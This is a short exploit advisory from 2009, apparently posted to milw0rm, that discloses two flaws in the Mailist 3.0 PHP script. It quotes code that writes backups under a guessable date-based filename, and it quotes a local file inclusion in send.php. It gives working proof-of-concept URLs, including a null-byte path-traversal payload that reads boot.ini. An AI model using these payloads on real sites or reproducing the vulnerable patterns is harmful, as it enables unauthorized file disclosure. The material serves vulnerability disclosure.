############################################################################################# [+] Mailist 3.0 Insecure Backup/Local File Inclusion [+] Discovered By SirGod [+] www.mortal-team.org [+] www.h4cky0u.org [+] www.hellzone.info [+] www.anti-intruders.org ############################################################################################# [+] Homepage : http://ninjadesigns.co.uk/ [+] Download : http://ninjadesigns.co.uk/enter/mailist.zip [+] Insecure Backup - Vulnerable code in admin.php --------------------------------------------------------------------- if (isset($_GET['backup'])){ echo "
"; $file = 'maillist.php'; $newfile = 'backups/'.date("jnY").'.txt'; copy($file, $newfile); echo 'Successfully backed up. (backups/'.$newfile.')
'; echo 'Hide
'; } ---------------------------------------------------------------------- We can see how its crated a backup : $newfile = 'backups/'.date("jnY").'.txt'; The date() function is used. n - Numeric representation of a month, without leading zeros j - Day of the month without leading zeros Y - A full numeric representation of a year, 4 digits So we can guess the database backup if we know when was created. Example : 622009.txt 6 - the day without leading 0 2 - the month without leading 0 2009 - the year PoC : http://127.0.0.1/path/backups/622009.txt [+] Local File Inclusion - Vulnerable code in send.php : --------------------------------------------------------------------- if(isset($load)){ include("outbox/".$load.".txt"); } --------------------------------------------------------------------- Example : http://127.0.0.1/path/send.php?load=[Local File]%00 PoC : http://127.0.0.1/path/send.php?load=../../../../boot.ini%00 ############################################################################################# # milw0rm.com [2009-02-06]